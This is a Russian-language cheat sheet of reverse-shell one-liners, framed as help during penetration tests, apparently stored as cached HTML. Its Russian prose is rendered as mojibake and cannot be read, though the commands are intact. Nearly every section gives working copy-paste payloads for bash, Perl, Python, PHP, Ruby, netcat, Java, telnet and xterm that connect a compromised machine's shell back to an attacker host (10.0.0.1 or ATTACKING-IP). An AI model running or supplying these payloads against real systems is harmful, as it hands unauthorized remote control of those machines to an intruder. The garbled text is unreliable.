I"¨ <h1 class="no_toc" id="–æ–≥–ª–∞–≤–ª–µ–Ω–∏–µ">–û–≥–ª–∞–≤–ª–µ–Ω–∏–µ</h1>

<ul id="markdown-toc">
  <li><a href="#–æ–±—â–∏–µ-—Å–ª–æ–≤–∞" id="markdown-toc-–æ–±—â–∏–µ-—Å–ª–æ–≤–∞">–û–±—â–∏–µ —Å–ª–æ–≤–∞</a></li>
  <li><a href="#bash" id="markdown-toc-bash">Bash</a></li>
  <li><a href="#perl" id="markdown-toc-perl">PERL</a></li>
  <li><a href="#python" id="markdown-toc-python">Python</a></li>
  <li><a href="#php" id="markdown-toc-php">PHP</a></li>
  <li><a href="#ruby" id="markdown-toc-ruby">Ruby</a></li>
  <li><a href="#netcat" id="markdown-toc-netcat">Netcat</a></li>
  <li><a href="#java" id="markdown-toc-java">Java</a></li>
  <li><a href="#telnet" id="markdown-toc-telnet">Telnet</a></li>
  <li><a href="#xterm" id="markdown-toc-xterm">xterm</a></li>
</ul>

<h1 id="–æ–±—â–∏–µ-—Å–ª–æ–≤–∞">–û–±—â–∏–µ —Å–ª–æ–≤–∞</h1>

<p>–ï—Å–ª–∏ —Ç–µ–±–µ –ø–æ–≤–µ–∑–ª–æ –æ–±–Ω–∞—Ä—É–∂–∏—Ç—å —É—è–∑–≤–∏–º–æ—Å—Ç—å –≤—ã–ø–æ–ª–Ω–µ–Ω–∏—è –∫–æ–º–∞–Ω–¥ –≤–æ –≤—Ä–µ–º—è —Ç–µ—Å—Ç–∞ –Ω–∞ –ø—Ä–æ–Ω–∏–∫–Ω–æ–≤–µ–Ω–∏–µ, –¥–æ–≤–æ–ª—å–Ω–æ —Å–∫–æ—Ä–æ —Ç–µ–±–µ –∑–∞—Ö–æ—á–µ—Ç—Å—è –∏–Ω—Ç–µ—Ä–∞–∫—Ç–∏–≤–Ω—ã–π —à–µ–ª–ª.</p>

<p>–ï—Å–ª–∏ –Ω–µ –ø–æ–ª—É—á–∞–µ—Ç—Å—è –¥–æ–±–∞–≤–∏—Ç—å –Ω–æ–≤—ã–π –∞–∫–∫–∞—É–Ω—Ç / SSH –∫–ª—é—á / .rhosts —Ñ–∞–π–ª, —Ç–≤–æ–π —Å–ª–µ–¥—É—é—â–∏–π —à–∞–≥, –≤–µ—Ä–æ—è—Ç–Ω–æ, –±—É–¥–µ—Ç –ª–∏–±–æ –¥–µ–ª–∞—Ç—å –æ–±—Ä–∞—Ç–Ω—ã–π —à–µ–ª–ª, –ª–∏–±–æ –ø—Ä–∏–≤—è–∑—ã–≤–∞—Ç—å –æ–±–æ–ª–æ—á–∫—É –∫ –ø–æ—Ä—Ç—É TCP. –≠—Ç–∞ —Å—Ç—Ä–∞–Ω–∏—Ü–∞ –ø–æ–º–æ–∂–µ—Ç —Å –ø–µ—Ä–≤—ã–º.</p>

<p>–í–∞—Ä–∏–∞–Ω—Ç—ã –¥–µ–ª–∞—Ç—å –æ–±—Ä–∞—Ç–Ω—ã–π —à–µ–ª–ª –æ–≥—Ä–∞–Ω–∏—á–µ–Ω—ã —è–∑—ã–∫–∞–º–∏ —Å—Ü–µ–Ω–∞—Ä–∏–µ–≤, —É—Å—Ç–∞–Ω–æ–≤–ª–µ–Ω–Ω—ã–º–∏ –≤ —Ü–µ–ª–µ–≤–æ–π —Å–∏—Å—Ç–µ–º–µ, —Ö–æ—Ç—è —Ç–∞–∫–∂–µ –º–æ–∂–µ—Ç–µ –∑–∞–≥—Ä—É–∑–∏—Ç—å –±–∏–Ω–∞—Ä–Ω–∏–∫, –µ—Å–ª–∏ –¥–æ—Å—Ç–∞—Ç–æ—á–Ω–æ —Ö–æ—Ä–æ—à–æ –ø–æ–¥–≥–æ—Ç–æ–≤–∏—Ç—å—Å—è.</p>

<p>–ü–æ–∫–∞–∑–∞–Ω–Ω—ã–µ –ø—Ä–∏–º–µ—Ä—ã –ø—Ä–µ–¥–Ω–∞–∑–Ω–∞—á–µ–Ω—ã –¥–ª—è Unix-–ø–æ–¥–æ–±–Ω—ã—Ö —Å–∏—Å—Ç–µ–º. –ù–µ–∫–æ—Ç–æ—Ä—ã–µ –∏–∑ –ø—Ä–∏–≤–µ–¥–µ–Ω–Ω—ã—Ö –Ω–∏–∂–µ –ø—Ä–∏–º–µ—Ä–æ–≤ —Ç–∞–∫–∂–µ –¥–æ–ª–∂–Ω—ã —Ä–∞–±–æ—Ç–∞—Ç—å –≤ Windows, –µ—Å–ª–∏ –≤—ã –∏—Å–ø–æ–ª—å–∑—É–µ—Ç–µ –∑–∞–º–µ–Ω—É ‚Äú/bin/sh -i‚Äù —Å ‚Äúcmd.exe‚Äù.</p>

<p>–ü–æ—á—Ç–∏ –∫–∞–∂–¥—ã–π –∏–∑ –º–µ—Ç–æ–¥–æ–≤ –ø—Ä–∏–≤–µ–¥–µ–Ω–Ω—ã—Ö –Ω–∏–∂–µ –ø—Ä–µ–¥–Ω–∞–∑–Ω–∞—á–µ–Ω –¥–ª—è –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏—è –≤ –∫–∞—á–µ—Å—Ç–≤–µ –æ–¥–Ω–æ–π —Å—Ç—Ä–æ–∫–∏ –∫–æ—Ç–æ—Ä—É—é –º–æ–∂–Ω–æ –∫–æ–ø–∏—Ä–æ–≤–∞—Ç—å/–≤—Å—Ç–∞–≤–ª—è—Ç—å. –≠—Ç–æ –¥–æ–≤–æ–ª—å–Ω–æ –∫–æ—Ä–æ—Ç–∫–∏–µ —Å—Ç—Ä–æ–∫–∏, –Ω–æ –Ω–µ –æ—á–µ–Ω—å —á–∏—Ç–∞–µ–º—ã–µ.</p>

<h1 id="bash">Bash</h1>

<p>–ù–µ–∫–æ—Ç–æ—Ä—ã–µ –≤–µ—Ä—Å–∏–∏ bash –º–æ–≥—É—Ç –ø–æ–º–æ—á—å —Å —Ä–µ–≤–µ—Ä—Å —à–µ–ª–ª–æ–º (—Ç–µ—Å—Ç–∏—Ä–æ–≤–∞–Ω–Ω–æ –Ω–∞ Ubuntu 10.10):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exec /bin/bash 0&amp;0 2&gt;&amp;0
</code></pre></div></div>
<h1 id="perl">PERL</h1>

<p>–í–æ—Ç –∫–æ—Ä–æ—Ç–∫–∞—è, –Ω–µ –∑–∞–≤–∏—Å–∏—â–∞—è –æ—Ç —Ñ–∏—á –≤–µ—Ä—Å–∏—è  perl —Ä–µ–≤–µ—Ä—Å —à–µ–ª–ª–∞:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'
</code></pre></div></div>

<p>–ò –¥–ª—è Windows</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'
</code></pre></div></div>

<h1 id="python">Python</h1>

<p>–¢–µ—Å—Ç–∏—Ä–æ–≤–∞–Ω–Ω–æ –Ω–∞ Linux/Python 2.7:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
</code></pre></div></div>

<h1 id="php">PHP</h1>

<p>–≠—Ç–æ—Ç –∫–æ–¥ –ø—Ä–µ–¥–ø–æ–ª–∞–≥–∞–µ—Ç TCP —Å–æ–µ–¥–∏–Ω–µ–Ω–∏–µ —Å –¥–µ—Å–∫—Ä–∏–ø—Ç–æ—Ä–æ–º 3. –≠—Ç–æ —Ä–∞–±–æ—Ç–∞–ª–æ –Ω–∞ —Ç–µ—Å—Ç —Å–∏—Å—Ç–µ–º–µ. –ï—Å–ª–∏ –Ω–µ —Ä–∞–±–æ—Ç–∞–µ—Ç, –ø–æ–ø—Ä–æ–±—É–π 4, 5, 6‚Ä¶</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'
</code></pre></div></div>

<p>–ï—Å–ª–∏ —Ö–æ—á–µ—à—å .php —Ñ–∞–π–ª –¥–ª—è –∑–∞–≥—Ä—É–∑–∫–∏, –ø–æ—Å–º–æ—Ç—Ä–∏ –±–æ–ª–µ–µ –Ω–∞–≤–æ—Ä–æ—á–µ–Ω–Ω—ã–µ php.</p>

<h1 id="ruby">Ruby</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'
</code></pre></div></div>

<h1 id="netcat">Netcat</h1>

<p>Netcat —Ä–µ–¥–∫–æ –ø—Ä–∏—Å—É—Ç—Å—Ç–≤—É–µ—Ç –≤ –ø—Ä–æ–¥–∞–∫—à–µ–Ω —Å–∏—Å—Ç–µ–º–∞—Ö, –∏ –¥–∞–∂–µ –µ—Å–ª–∏ —Ç–∞–º –Ω–µ—Å–∫–æ–ª—å–∫–æ –≤–µ—Ä—Å–∏–π netcat, –Ω–µ–∫–æ—Ç–æ—Ä—ã–µ –∏–∑ –Ω–∏—Ö –Ω–µ –ø–æ–¥–¥–µ—Ä–∂–∏–≤–∞—é—Ç –æ–ø—Ü–∏—é -e.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -e /bin/sh 10.0.0.1 1234
</code></pre></div></div>

<p>–ï—Å–ª–∏ —É –≤–∞—Å —É—Å—Ç–∞–Ω–æ–≤–ª–µ–Ω–∞ –Ω–µ–ø—Ä–∞–≤–∏–ª—å–Ω–∞—è –≤–µ—Ä—Å–∏—è netcat, —Ç—ã –≤—Å—ë —Ä–∞–≤–Ω–æ –º–æ–∂–µ—à—å –ø–æ–ª—É—á–∏—Ç—å —Ä–µ–≤–µ—Ä—Å —à–µ–ª–ª –≤–æ—Ç —Ç–∞–∫:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f
</code></pre></div></div>

<h1 id="java">Java</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/10.0.0.1/2002;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])
p.waitFor()
</code></pre></div></div>

<h1 id="telnet">Telnet</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rm -f /tmp/p; mknod /tmp/p p &amp;&amp; telnet ATTACKING-IP 80 0/tmp/p
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
</code></pre></div></div>

<p>–ù–µ –∑–∞–±—É–¥—å —Ç–∞–∫–∂–µ —Å–ª—É—à–∞—Ç—å 443 –Ω–∞ –∞—Ç–∞–∫—É—é—â–µ–π –º–∞—à–∏–Ω–µ.</p>

<h1 id="xterm">xterm</h1>

<p>–û–¥–Ω–æ–π –∏–∑ —Å–∞–º—ã—Ö –ø—Ä–æ—Å—Ç—ã—Ö —Ñ–æ—Ä–º –æ–±—Ä–∞—Ç–Ω–æ–π –æ–±–æ–ª–æ—á–∫–∏ —è–≤–ª—è–µ—Ç—Å—è xterm. –°–ª–µ–¥—É—é—â–∞—è –∫–æ–º–∞–Ω–¥–∞ –¥–æ–ª–∂–Ω–∞ –±—ã—Ç—å –∑–∞–ø—É—â–µ–Ω–∞ –Ω–∞ —Å–µ—Ä–≤–µ—Ä–µ. –û–Ω –ø–æ–ø—ã—Ç–∞–µ—Ç—Å—è –ø–æ–¥–∫–ª—é—á–∏—Ç—å—Å—è –∫ —Ç–µ–±–µ (10.0.0.1) —á–µ—Ä–µ–∑ TCP-–ø–æ—Ä—Ç 6001.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xterm -display 10.0.0.1:1
</code></pre></div></div>

<p>–ß—Ç–æ–±—ã –ø–µ—Ä–µ—Ö–≤–∞—Ç–∏—Ç—å –≤—Ö–æ–¥—è—â–∏–π xterm, –∑–∞–ø—É—Å—Ç–∏ X-—Å–µ—Ä–≤–µ—Ä (:1 - –∫–æ—Ç–æ—Ä—ã–π –ø—Ä–æ—Å–ª—É—à–∏–≤–∞–µ—Ç TCP-–ø–æ—Ä—Ç 6001). –û–¥–∏–Ω –∏–∑ —Å–ø–æ—Å–æ–±–æ–≤ —Å–¥–µ–ª–∞—Ç—å —ç—Ç–æ —Å –ø–æ–º–æ—â—å—é Xnest (–¥–ª—è –∑–∞–ø—É—Å–∫–∞ –≤ —Ç–≤–æ–µ–π —Å–∏—Å—Ç–µ–º–µ):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Xnest :1
</code></pre></div></div>

<p>–¢–µ–±–µ –Ω—É–∂–Ω–æ –∞–≤—Ç–æ—Ä–∏–∑–æ–≤–∞—Ç—å —Ü–µ–ª—å –¥–ª—è –ø–æ–¥–∫–ª—é—á–µ–Ω–∏—è (–∫–æ–º–∞–Ω–¥–∞ —Ç–∞–∫–∂–µ –∑–∞–ø—É—Å–∫–∞–µ—Ç—Å—è –Ω–∞ —Ç–≤–æ–µ–º —Ö–æ—Å—Ç–µ):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xhost +targetip
</code></pre></div></div>
:ET